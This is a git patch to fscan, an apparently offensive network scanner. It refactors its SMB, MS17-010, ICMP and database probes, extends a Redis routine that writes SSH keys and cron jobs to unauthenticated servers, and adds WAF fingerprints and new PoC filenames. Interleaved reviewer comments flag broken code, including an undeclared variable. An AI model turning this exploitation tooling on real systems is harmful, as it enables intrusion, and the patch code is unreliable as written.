From d5665f03d649bd26501ccd08638a1ff32cfd68b9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=BD=B1=E8=88=9E=E8=80=85?=
Date: Fri, 10 Sep 2021 20:32:51 +0800
Subject: [PATCH] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E6=8C=87=E7=BA=B9=E3=80=81?= =?UTF-8?q?=E4=BC=98=E5=8C=96=E5=86=85=E5=AD=98=E5=8D=A0=E7=94=A8?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 Plugins/CVE-2020-0796.go | 6 +-
 Plugins/NetBIOS.go | 12 +-
 Plugins/fcgiscan.go | 5 +
 Plugins/findnet.go | 6 +-
 Plugins/icmp.go | 12 +-
 Plugins/memcached.go | 6 +-
 Plugins/mongodb.go | 6 +-
 Plugins/ms17017.go | 7 +-
 Plugins/portscan.go | 10 +-
 Plugins/redis.go | 42 +++--
 Plugins/smb.go | 3 +-
 Plugins/webtitle.go | 11 +-
 WebScan/info/rules.go | 154 ++++++++++++++++--
 WebScan/pocs/atlassian-confluence-rce.yml | 17 ++
 WebScan/pocs/seeyon-oa-cookie-leak.yml | 16 ++
 ...ology-sqli.yml => weaver-ecology-sqli.yml} | 0
 ...i.yml => weaver-ecology-validate-sqli.yml} | 0
 ...> weaver-ecology-workflowservicexml-2.yml} | 0
 ... => weaver-ecology-workflowservicexml.yml} | 0
 ...ole-weak.yml => weblogic-console-weak.yml} | 0
 20 files changed, 265 insertions(+), 48 deletions(-)
 create mode 100644 WebScan/pocs/atlassian-confluence-rce.yml
 create mode 100644 WebScan/pocs/seeyon-oa-cookie-leak.yml
 rename WebScan/pocs/{ecology-sqli.yml => weaver-ecology-sqli.yml} (100%)
 rename WebScan/pocs/{ecology-validate-sqli.yml => weaver-ecology-validate-sqli.yml} (100%)
 rename WebScan/pocs/{ecology-workflowservicexml-2.yml => weaver-ecology-workflowservicexml-2.yml} (100%)
 rename WebScan/pocs/{ecology-workflowservicexml.yml => weaver-ecology-workflowservicexml.yml} (100%)
 rename WebScan/pocs/{poc-yaml-weblogic-console-weak.yml => weblogic-console-weak.yml} (100%)
diff --git a/Plugins/CVE-2020-0796.go b/Plugins/CVE-2020-0796.go
index ee921aa..b63404b 100644
--- a/Plugins/CVE-2020-0796.go
+++ b/Plugins/CVE-2020-0796.go
@@ -104,6 +104,11 @@ func SmbGhostScan(info *common.HostInfo) error {
 ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
 addr := fmt.Sprintf("%s:%v", info.Host, port)
 conn, err := net.DialTimeout("tcp", addr, timeout)
+ defer func() {
+ if conn != nil{
+ conn.Close()
+ }
+ }()
 if err != nil {
 return err
 }
@@ -117,7 +122,6 @@ func SmbGhostScan(info *common.HostInfo) error {
 if err != nil {
 return err
 }
- defer conn.Close()
 if bytes.Contains(buff[:n], []byte("Public")) == true {
 result := fmt.Sprintf("[+] %v CVE-2020-0796 SmbGhost Vulnerable", ip)
 common.LogSuccess(result)
diff --git a/Plugins/NetBIOS.go b/Plugins/NetBIOS.go
index da93638..f99e17b 100644
--- a/Plugins/NetBIOS.go
+++ b/Plugins/NetBIOS.go
@@ -76,6 +76,11 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
 }
 realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
 conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+ defer func() {
+ if conn != nil{
+ conn.Close()
+ }
+ }()
 if err != nil {
 return
 }
@@ -83,7 +88,6 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
 if err != nil {
 return
 }
- defer conn.Close()
 if info.Ports == "139" && len(payload0) > 0 {
 _, err1 := conn.Write(payload0)
@@ -191,6 +195,11 @@ func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
 senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
 realhost := fmt.Sprintf("%s:%v", info.Host, 137)
 conn, err := net.DialTimeout("udp", realhost, time.Duration(info.Timeout)*time.Second)
+ defer func() {
+ if conn != nil{
+ conn.Close()
+ }
+ }()
 if err != nil {
 return
 }
@@ -198,7 +207,6 @@ func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
 if err != nil {
 return
 }
- defer conn.Close()
 _, err = conn.Write(senddata1)
 if err != nil {
 return
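Review bot: The nil-guarded deferred closure replaces a `defer conn.Close()` that sat right after the `if err != nil { return err }` check, and because `net.DialTimeout` returns a nil `net.Conn` together with its error, the original form was already safe and simpler; the new closure is also not gofmt-clean (`if conn != nil{`). Keeping `defer conn.Close()` immediately after the error check, or at least running gofmt so the brace gets its space, would be cleaner. The same closure is repeated in the NetBIOS.go, findnet.go, icmp.go, memcached.go, mongodb.go, ms17017.go and portscan.go hunks of this commit; memcached and portscan are the only two where the nil guard actually matters, since those functions did not return early on a dial error.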
diff --git a/Plugins/fcgiscan.go b/Plugins/fcgiscan.go
index 9866af3..202eed7 100644
--- a/Plugins/fcgiscan.go
+++ b/Plugins/fcgiscan.go
@@ -53,6 +53,11 @@ func FcgiScan(info *common.HostInfo) {
 }
 fcgi, err := New(addr, info.Timeout)
+ defer func() {
+ if fcgi.rwc != nil{
+ fcgi.rwc.Close()
+ }
+ }()
 if err != nil {
 errlog := fmt.Sprintf("[-] fcgi %v:%v %v", info.Host, info.Ports, err)
 common.LogError(errlog)
diff --git a/Plugins/findnet.go b/Plugins/findnet.go
index ce158da..d9a1e80 100644
--- a/Plugins/findnet.go
+++ b/Plugins/findnet.go
@@ -24,6 +24,11 @@ func Findnet(info *common.HostInfo) error {
 func FindnetScan(info *common.HostInfo) error {
 realhost := fmt.Sprintf("%s:%v", info.Host, 135)
 conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+ defer func() {
+ if conn != nil{
+ conn.Close()
+ }
+ }()
 if err != nil {
 return err
 }
@@ -31,7 +36,6 @@ func FindnetScan(info *common.HostInfo) error {
 if err != nil {
 return err
 }
- defer conn.Close()
 _, err = conn.Write(bufferV1)
 if err != nil {
 return err
diff --git a/Plugins/icmp.go b/Plugins/icmp.go
index d15e385..540ac98 100644
--- a/Plugins/icmp.go
+++ b/Plugins/icmp.go
@@ -51,8 +51,12 @@ func ICMPRun(hostslist []string, Ping bool) []string {
 common.LogError(err)
 //尝试无监听icmp探测
 conn, err := net.DialTimeout("ip4:icmp", "127.0.0.1", 3*time.Second)
+ defer func() {
+ if conn != nil{
+ conn.Close()
+ }
+ }()
 if err == nil {
- go conn.Close()
 RunIcmp2(hostslist, chanHosts)
 } else {
 common.LogError(err)
@@ -138,10 +142,14 @@ func RunIcmp2(hostslist []string, chanHosts chan string) {
 func icmpalive(host string) bool {
 startTime := time.Now()
 conn, err := net.DialTimeout("ip4:icmp", host, 6*time.Second)
+ defer func() {
+ if conn != nil{
+ conn.Close()
+ }
+ }()
 if err != nil {
 return false
 }
- defer conn.Close()
 if err := conn.SetDeadline(startTime.Add(6 * time.Second)); err != nil {
 return false
 }
diff --git a/Plugins/memcached.go b/Plugins/memcached.go
index af776ee..d4dfe7a 100644
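Review bot: In FcgiScan the deferred closure dereferences `fcgi.rwc` before `err` is checked, so if `New` (outside this hunk) returns a nil pointer alongside its error, the deferred call panics with a nil-pointer dereference at function exit instead of the error being logged. Either move the `defer` below the `if err != nil` block, or guard both levels: `if fcgi != nil && fcgi.rwc != nil {`. FcgiScan's body continues past the hunk.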
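Review bot: In ICMPRun the probe socket dialled to `127.0.0.1` is now held open until the function returns, whereas the removed `go conn.Close()` released it as soon as the dial succeeded; ICMPRun's body continues past the hunk, so the raw ICMP socket stays open for the whole `RunIcmp2` sweep. Since the dial is only a capability probe, closing it right away is clearer and frees the descriptor: `if err == nil { conn.Close(); RunIcmp2(hostslist, chanHosts) }` and drop the deferred closure.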
--- a/Plugins/memcached.go
+++ b/Plugins/memcached.go
@@ -11,6 +11,11 @@ import (
 func MemcachedScan(info *common.HostInfo) (err error) {
 realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
 client, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+ defer func() {
+ if client != nil{
+ client.Close()
+ }
+ }()
 if err == nil {
 err = client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 if err == nil {
@@ -23,7 +28,6 @@ func MemcachedScan(info *common.HostInfo) (err error) {
 result := fmt.Sprintf("[+] Memcached %s unauthorized", realhost)
 common.LogSuccess(result)
 }
- client.Close()
 } else {
 errlog := fmt.Sprintf("[-] Memcached %v:%v %v", info.Host, info.Ports, err)
 common.LogError(errlog)
diff --git a/Plugins/mongodb.go b/Plugins/mongodb.go
index 03aa443..819c02b 100644
--- a/Plugins/mongodb.go
+++ b/Plugins/mongodb.go
@@ -24,10 +24,14 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
 getlogdata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
 realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
 conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+ defer func() {
+ if conn != nil{
+ conn.Close()
+ }
+ }()
 if err != nil {
 return flag, err
 }
- defer conn.Close()
 err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
 if err != nil {
 return flag, err
diff --git a/Plugins/ms17017.go b/Plugins/ms17017.go
index 61ccf8e..2b71949 100644
--- a/Plugins/ms17017.go
+++ b/Plugins/ms17017.go
@@ -29,15 +29,18 @@ func MS17010(info *common.HostInfo) error {
 }
 func MS17010Scan(info *common.HostInfo) error {
- ip := info.Host
 // connecting to a host in LAN if reachable should be very quick
 conn, err := net.DialTimeout("tcp", ip+":445", time.Duration(info.Timeout)*time.Second)
+ defer func() {
+ if conn != nil{
+ conn.Close()
+ }
+ }()
 if err != nil {
 //fmt.Printf("failed to connect to %s\n", ip)
 return err
 }
- defer conn.Close()
 err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 if err != nil {
 //fmt.Printf("failed to connect to %s\n", ip)
diff --git a/Plugins/portscan.go b/Plugins/portscan.go
index 982d858..f84f41c 100644
--- a/Plugins/portscan.go
+++ b/Plugins/portscan.go
@@ -71,13 +71,17 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
 func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) {
 host, port := addr.ip, addr.port
- con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
+ conn, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
+ defer func() {
+ if conn != nil{
+ conn.Close()
+ }
+ }()
 if err == nil {
- con.Close()
 address := host + ":" + strconv.Itoa(port)
 result := fmt.Sprintf("%s open", address)
 common.LogSuccess(result)
- respondingHosts <- address
 wg.Add(1)
+ respondingHosts <- address
 }
 }
diff --git a/Plugins/redis.go b/Plugins/redis.go
index c9752ff..c94dbde 100644
--- a/Plugins/redis.go
+++ b/Plugins/redis.go
@@ -10,6 +10,11 @@ import (
 "time"
 )
+var (
+ dbfilename string
+ dir string
+)
+
 func RedisScan(info *common.HostInfo) (tmperr error) {
 starttime := time.Now().Unix()
 flag, err := RedisUnauth(info)
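Review bot: `ip := info.Host` is removed at the top of MS17010Scan, but `ip` is still used two lines later in `net.DialTimeout("tcp", ip+":445", ...)`; unless `ip` is declared at package level or somewhere else outside this hunk, the file no longer compiles. If the intent was to drop the local, replace the use with `info.Host+":445"`; otherwise restore the declaration. MS17010Scan's body continues past the hunk.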
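Review bot: `dbfilename` and `dir` become package-level variables that RedisConn and RedisUnauth (the next two hunks) assign from `getconfig` and that Expoilt now reads implicitly, which turns per-connection state into shared mutable state: if the scanner runs plugins concurrently (not visible here), goroutines race on these globals and one connection can observe another host's values. Keep them local and pass them explicitly, e.g. `func Expoilt(realhost string, conn net.Conn, dbfilename, dir string) error` with both callers doing `err = Expoilt(realhost, conn, dbfilename, dir)`. The `var` block should then be removed again.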
@@ -57,9 +62,16 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
 return flag, err
 }
 if strings.Contains(reply, "+OK") {
- result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
- common.LogSuccess(result)
 flag = true
+ dbfilename, dir, err = getconfig(conn)
+ if err != nil {
+ result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
+ common.LogSuccess(result)
+ return flag,err
+ }else {
+ result := fmt.Sprintf("[+] Redis:%s %s file:%s/%s", realhost, pass, dir, dbfilename)
+ common.LogSuccess(result)
+ }
 err = Expoilt(realhost, conn)
 }
 return flag, err
@@ -86,19 +98,22 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
 return flag, err
 }
 if strings.Contains(reply, "redis_version") {
- result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
- common.LogSuccess(result)
 flag = true
+ dbfilename, dir, err = getconfig(conn)
+ if err != nil {
+ result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
+ common.LogSuccess(result)
+ return flag,err
+ }else {
+ result := fmt.Sprintf("[+] Redis:%s unauthorized file:%s/%s", realhost,dir,dbfilename)
+ common.LogSuccess(result)
+ }
 err = Expoilt(realhost, conn)
 }
 return flag, err
 }
 func Expoilt(realhost string, conn net.Conn) error {
- dbfilename, dir, err := getconfig(conn)
- if err != nil {
- return err
- }
 flagSsh, flagCron, err := testwrite(conn)
 if err != nil {
 return err
@@ -116,7 +131,7 @@ func Expoilt(realhost string, conn net.Conn) error {
 result := fmt.Sprintf("[+] %v SSH public key was written successfully", realhost)
 common.LogSuccess(result)
 } else {
- fmt.Println("Redis:", realhost, "SSHPUB write failed", text)
+ fmt.Println("[-] Redis:", realhost, "SSHPUB write failed", text)
 }
 }
 }
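Review bot: The new `if err != nil { ... return flag,err }else { ... }` block in RedisConn, and the identical one in RedisUnauth in the next hunk, put an `else` after a branch that returns and are not gofmt-clean (`return flag,err`, `}else {`); keep the happy path left-aligned by logging the plain message and returning inside the `if`, then building the `file:%s/%s` message unconditionally after it. Note also that when `getconfig` fails these functions return `flag == true` together with a non-nil error, so a caller that treats any error as "not reachable" would discard a positive result; it is worth deciding which of the two signals the caller should trust and documenting it on the function.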
@@ -268,14 +283,15 @@ func Readfile(filename string) (string, error) {
 }
 func readreply(conn net.Conn) (result string, err error) {
- buf := make([]byte, 4096)
+ size := 5 * 1024
+ buf := make([]byte, size)
 for {
 count, err := conn.Read(buf)
 if err != nil {
 break
 }
 result += string(buf[0:count])
- if count < 4096 {
+ if count < size {
 break
 }
 }
@@ -318,7 +334,7 @@ func getconfig(conn net.Conn) (dbfilename string, dir string, err error) {
 if err != nil {
 return
 }
- text1 := strings.Split(text, "\n")
+ text1 := strings.Split(text, "\r\n")
 if len(text1) > 2 {
 dbfilename = text1[len(text1)-2]
 } else {
@@ -332,7 +348,7 @@ func getconfig(conn net.Conn) (dbfilename string, dir string, err error) {
 if err != nil {
 return
 }
- text1 = strings.Split(text, "\n")
+ text1 = strings.Split(text, "\r\n")
 if len(text1) > 2 {
 dir = text1[len(text1)-2]
 } else {
diff --git a/Plugins/smb.go b/Plugins/smb.go
index 4ea2858..2bf1954 100644
--- a/Plugins/smb.go
+++ b/Plugins/smb.go
@@ -1,6 +1,7 @@
 package Plugins
 import (
+ "errors"
 "fmt"
 "github.com/shadow1ng/fscan/common"
 "github.com/stacktitan/smb/smb"
@@ -72,6 +73,6 @@ func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool,
 case <-signal:
 return flag, err
 case <-time.After(time.Duration(info.Timeout) * time.Second):
- return false, err
+ return false,errors.New("time out")
 }
 }
diff --git a/Plugins/webtitle.go b/Plugins/webtitle.go
index d4b0f78..2d8f0c7 100644
--- a/Plugins/webtitle.go
+++ b/Plugins/webtitle.go
@@ -8,7 +8,6 @@ import (
 "github.com/shadow1ng/fscan/WebScan"
 "github.com/shadow1ng/fscan/WebScan/lib"
 "github.com/shadow1ng/fscan/common"
- "golang.org/x/net/html/charset"
 "golang.org/x/text/encoding/simplifiedchinese"
 "golang.org/x/text/transform"
 "io"
@@ -56,6 +55,7 @@ func GOWebTitle(info *common.HostInfo) error {
 if err != nil && !strings.Contains(err.Error(), "EOF") {
 return err
 }
+
 if strings.Contains(result, "://") {
 //有跳转
 redirecturl, err := url.Parse(result)
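Review bot: `size := 5 * 1024` in readreply is an unexplained constant, and the loop still treats any read shorter than `size` as the end of the reply (`if count < size { break }`); a TCP read may return fewer bytes than the buffer while more data is still in flight, so a reply larger than 5 KiB or one delivered in several segments can be silently truncated. Name the constant (`const replyBufSize = 5 * 1024`) with a comment on why 5 KiB was chosen, and consider terminating on the RESP `\r\n` delimiter or a read deadline instead of a short read. Separately, `count, err := conn.Read(buf)` declares a new `err` that shadows the named result, so readreply always returns a nil error even when the read failed; use `=` with a predeclared `count` so the caller sees the failure.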
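Review bot: `return false,errors.New("time out")` in doWithTimeOut is not gofmt-clean; write it as `return false, errors.New("time out")`, and since the same string is presumably what callers will match on, a package sentinel `var ErrTimeout = errors.New("time out")` would let them use `errors.Is`. The goroutine that sends on `signal` is outside this hunk; if `signal` is unbuffered it will block forever once the timeout branch has returned, so please confirm it is buffered or otherwise drained.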
@@ -174,14 +174,14 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
 return ""
 }
 encode := GetEncoding()
- _, encode1, _ := charset.DetermineEncoding(body, "")
+ //_, encode1, _ := charset.DetermineEncoding(body, "")
 var encode2 string
 detector := chardet.NewTextDetector()
 detectorstr, _ := detector.DetectBest(body)
 if detectorstr != nil {
 encode2 = detectorstr.Charset
 }
- if encode == "gbk" || encode == "gb2312" || encode1 == "gbk" || strings.Contains(strings.ToLower(encode2), "gb") {
+ if encode == "gbk" || encode == "gb2312" || strings.Contains(strings.ToLower(encode2), "gb") {
 titleGBK, err := Decodegbk(text)
 if err == nil {
 title = string(titleGBK)
@@ -204,9 +204,9 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
 }
 length := resp.Header.Get("Content-Length")
 if length == "" {
- length = fmt.Sprintf("%v", len(text))
+ length = fmt.Sprintf("%v", len(body))
 }
- result := fmt.Sprintf("[*] WebTitle:%-25v code:%-3v len:%-6v title:%v", Url, resp.StatusCode, length, title)
+ result := fmt.Sprintf("[*] WebTitle:%-25v code:%-3v len:%-6v title:%v", resp.Request.URL, resp.StatusCode, length, title)
 common.LogSuccess(result)
 }
 CheckData = append(CheckData, WebScan.CheckDatas{body, fmt.Sprintf("%s", resp.Header)})
@@ -258,7 +258,6 @@ func getRespBody(oResp *http.Response) ([]byte, error) {
 if err != nil {
 return nil, err
 }
- defer oResp.Body.Close()
 body = raw
 }
 return body, nil
diff --git a/WebScan/info/rules.go b/WebScan/info/rules.go
index 5a7e992..e7b3a76 100644
--- a/WebScan/info/rules.go
+++ b/WebScan/info/rules.go
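Review bot: The `charset.DetermineEncoding` call in geturl is kept as commented-out code (`//_, encode1, _ := charset.DetermineEncoding(body, "")`) rather than deleted; the import was already removed in the first webtitle.go hunk, so the line is dead and will drift out of sync with the real detection logic. Drop it, and if the reason for the change should be preserved, state it in a comment that documents the remaining logic: `// charset is detected with chardet only; the x/net/html/charset detector was removed`.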
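Review bot: Removing `defer oResp.Body.Close()` from getRespBody is correct only if every caller closes the response body itself; the callers are outside this hunk, so please confirm, otherwise each title fetch leaks the body and its pooled connection. If the caller now owns the close, document the contract on the function: `// getRespBody reads oResp.Body into memory; the caller remains responsible for closing oResp.Body.`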
@@ -17,11 +17,49 @@ type PocData struct {
 }
 var RuleDatas = []RuleData{
+ {"宝塔", "body", "(app.bt.cn/static/app.png|安全入口校验失败|入口校验失败|href=\"http://www.bt.cn/bbs)"},
+ {"深信服防火墙类产品", "code", "(SANGFOR FW)"},
+ {"360网站卫士", "code", "(webscan.360.cn/status/pai/hash|wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)"},
+ {"360网站卫士", "headers", "(360wzws|CWAP-waf|zhuji.360.cn|X-Safe-Firewall)"},
+ {"绿盟防火墙", "code", "(NSFOCUS NF)"},
+ {"绿盟防火墙", "headers", "(NSFocus)"},
+ {"Topsec-Waf", "index", `(",")`},
+ {"Anquanbao", "headers", "(Anquanbao)"},
+ {"BaiduYunjiasu", "headers", "(yunjiasu)"},
+ {"BigIP", "headers", "(BigIP|BIGipServer)"},
+ {"BinarySEC", "headers", "(binarysec)"},
+ {"BlockDoS", "headers", "(BlockDos.net)"},
+ {"CloudFlare", "headers", "(cloudflare)"},
+ {"Cloudfront", "headers", "(cloudfront)"},
+ {"Comodo", "headers", "(Protected by COMODO)"},
+ {"IBM-DataPower", "headers", "(X-Backside-Transport)"},
+ {"DenyAll", "headers", "(sessioncookie=)"},
+ {"dotDefender", "headers", "(dotDefender)"},
+ {"Incapsula", "headers", "(X-CDN|Incapsula)"},
+ {"Jiasule", "headers", "(jsluid=)"},
+ {"KONA", "headers", "(AkamaiGHost)"},
+ {"ModSecurity", "headers", "(Mod_Security|NOYB)"},
+ {"NetContinuum", "headers", "(Cneonction|nnCoection|citrix_ns_id)"},
+ {"Newdefend", "headers", "(newdefend)"},
+ {"Safe3", "headers", "(Safe3WAF|Safe3 Web Firewall)"},
+ {"Safedog", "code", "(404.safedog.cn/images/safedogsite/broswer_logo.jpg)"},
+ {"Safedog", "headers", "(Safedog|WAF/2.0)"},
+ {"SonicWALL", "headers", "(SonicWALL)"},
+ {"Stingray", "headers", "(X-Mapping-)"},
+ {"Sucuri", "headers", "(Sucuri/Cloudproxy)"},
+ {"Usp-Sec", "headers", "(Secure Entry Server)"},
+ {"Varnish", "headers", "(varnish)"},
+ {"Wallarm", "headers", "(wallarm)"},
+ {"阿里云", "code", "(errors.aliyun.com)"},
+ {"WebKnight", "headers", "(WebKnight)"},
+ {"Yundun", "headers", "(YUNDUN)"},
+ {"Yunsuo", "headers", "(yunsuo)"},
+ {"Coding pages", "header", "(Coding Pages)"},
+ {"启明防火墙", "body", "(/cgi-bin/webui?op=get_product_model)"},
 {"Shiro", "headers", "(=deleteMe|rememberMe=)"},
 {"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
 {"Gogs简易Git服务", "cookie", "(i_like_gogs)"},
 {"Gitea简易Git服务", "cookie", "(i_like_gitea)"},
- {"宝塔-BT.cn", "code", "(app.bt.cn/static/app.png|安全入口校验失败)"},
 {"Nexus", "code", "(Nexus Repository Manager)"},
 {"Nexus", "cookie", "(NX-ANTI-CSRF-TOKEN)"},
 {"Harbor", "code", "(Harbor)"},
@@ -32,11 +70,9 @@ var RuleDatas = []RuleData{
 {"协众OA", "cookie", "(CNOAOASESSID)"},
 {"xxl-job", "code", "(分布式任务调度平台XXL-JOB)"},
 {"atmail-WebMail", "cookie", "(atmail6)"},
- {"atmail-WebMail", "code", "(Powered by Atmail)"},
- {"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin)"},
+ {"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin|Powered by Atmail)"},
 {"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|Hypertext Transfer Protocol -- HTTP/1.1)"},
- {"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
- {"致远OA", "code", "(/seeyon/common/)"},
+ {"致远OA", "code", "(/seeyon/common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
 {"discuz", "code", "(content=\"Discuz! X\")"},
 {"Typecho", "code", "(Typecho)"},
 {"金蝶EAS", "code", "(easSessionId)"},
@@ -56,7 +92,7 @@ var RuleDatas = []RuleData{
 {"万户网络", "code", "(css/css_whir.css)"},
 {"Spark_Master", "code", "(Spark Master at)"},
 {"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
- {"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
+ {"蓝凌OA", "code", "(/scripts/jquery.landray.common.js)"},
 {"深信服ssl-vpn", "code", "(login_psw.csp)"},
 {"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
 {"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
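Review bot: Two of the new entries use kind strings that appear nowhere else in the table: `{"Topsec-Waf", "index", ...}` and `{"Coding pages", "header", ...}`, whereas the existing rules use `code`, `headers` and `cookie`; `body` is also introduced for the first time by this hunk (`宝塔`, `启明防火墙`). Unless the matcher (outside this file) knows `index`, `header` and `body`, those rules can never fire — `header` looks like a typo for `headers`, and the `index` rule's pattern `(",")` would match almost any JSON response anyway, so it is probably better removed. A comment above `RuleDatas` listing the accepted kinds would stop this class of typo: `// RuleData kinds understood by the matcher: "code", "headers", "cookie" (confirm whether "body" is supported).`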
@@ -95,7 +131,6 @@ var RuleDatas = []RuleData{
 {"exchange", "code", "(/owa/auth.owa)"},
 {"Spark_Worker", "code", "(Spark Worker at)"},
 {"H3C ER3108G", "code", "(ER3108G系统管理)"},
- {"深信服防火墙类产品", "code", "(SANGFOR FW)"},
 {"Citrix-ConfProxy", "code", "(confproxy)"},
 {"360网站安全检测", "code", "(webscan.360.cn/status/pai/hash)"},
 {"H3C ER5200G2", "code", "(ER5200G2系统管理)"},
@@ -106,7 +141,6 @@ var RuleDatas = []RuleData{
 {"TP-Link 3600 DD-WRT", "code", "(TP-Link 3600 DD-WRT)"},
 {"NETGEAR WNDR3600", "code", "(NETGEAR WNDR3600)"},
 {"H3C ER2100", "code", "(ER2100系统管理)"},
- {"绿盟下一代防火墙", "code", "(NSFOCUS NF)"},
 {"jira", "code", "(jira.webresources)"},
 {"金和协同管理平台", "code", "(金和协同管理平台)"},
 {"Citrix-NetScaler", "code", "(NS-CACHE)"},
@@ -120,7 +154,7 @@ var RuleDatas = []RuleData{
 {"Jboss", "code", "(Welcome to JBoss|jboss.css)"},
 {"Jboss", "headers", "(JBoss)"},
 {"泛微E-mobile", "code", "(Weaver E-mobile|weaver,e-mobile)"},
- {"泛微E-Mobile", "headers", "(EMobileServer)"},
+ {"泛微E-mobile", "headers", "(EMobileServer)"},
 {"齐治堡垒机", "code", "(logo-icon-ico72.png|resources/themes/images/logo-login.png)"},
 {"ThinkPHP", "headers", "(ThinkPHP)"},
 {"ThinkPHP", "code", "(/Public/static/js/)"},
@@ -137,18 +171,97 @@ var RuleDatas = []RuleData{
 {"finereport", "code", "(isSupportForgetPwd|FineReport,Web Reporting Tool)"},
 {"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization)"},
 {"GitLab", "code", "(href=\"https://about.gitlab.com/)"},
- {"用友NC", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg)"},
+ {"用友", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"},
 {"Jquery-1.7.2", "code", "(/webui/js/jquerylib/jquery-1.7.2.min.js)"},
 {"Hadoop Applications", "code", "(/cluster/app/application)"},
- {"用友IUFO", "code", "(iufo/web/css/menu.css)"},
 {"海昌OA", "code", "(/loginmain4/js/jquery.min.js)"},
+ {"帆软报表", "code", "(WebReport/login.html|ReportServer)"},
+ {"帆软报表", "headers", "(数据决策系统)"},
+ {"华夏ERP", "headers", "(华夏ERP)"},
+ {"金和OA", "cookie", "(ASPSESSIONIDSSCDTDBS)"},
+ {"久其财务报表", "code", "(netrep/login.jsp|/netrep/intf)"},
+ {"若依管理系统", "code", "(ruoyi/login.js|ruoyi/js/ry-ui.js)"},
+ {"启莱OA", "code", "(js/jQselect.js|js/jquery-1.4.2.min.js)"},
+ {"智慧校园管理系统", "code", "(DC_Login/QYSignUp)"},
+ {"JQuery-1.7.2", "code", "(webui/js/jquerylib/jquery-1.7.2.min.js)"},
+ {"浪潮 ClusterEngineV4.0", "code", "(0;url=module/login/login.html)"},
+ {"会捷通云视讯平台", "code", "(him/api/rest/v1.0/node/role|him.app)"},
+ {"源码泄露账号密码 F12查看", "code", "(get_dkey_passwd)"},
+ {"Smartbi Insight", "code", "(smartbi.gcf.gcfutil)"},
+ {"汉王人脸考勤管理系统", "code", "(汉王人脸考勤管理系统|/Content/image/hanvan.png|/Content/image/hvicon.ico)"},
+ {"亿赛通-电子文档安全管理系统", "code", "(电子文档安全管理系统|/CDGServer3/index.jsp|/CDGServer3/SysConfig.jsp|/CDGServer3/help/getEditionInfo.jsp)"},
+ {"天融信 TopApp-LB 负载均衡系统", "code", "(TopApp-LB 负载均衡系统)"},
+ {"中新金盾信息安全管理系统", "code", "(中新金盾信息安全管理系统|中新网络信息安全股份有限公司)"},
+ {"好视通", "code", "(深圳银澎云计算有限公司|itunes.apple.com/us/app/id549407870|hao-shi-tong-yun-hui-yi-yuan)"},
+ {"蓝海卓越计费管理系统", "code", "(蓝海卓越计费管理系统|星锐蓝海网络科技有限公司)"},
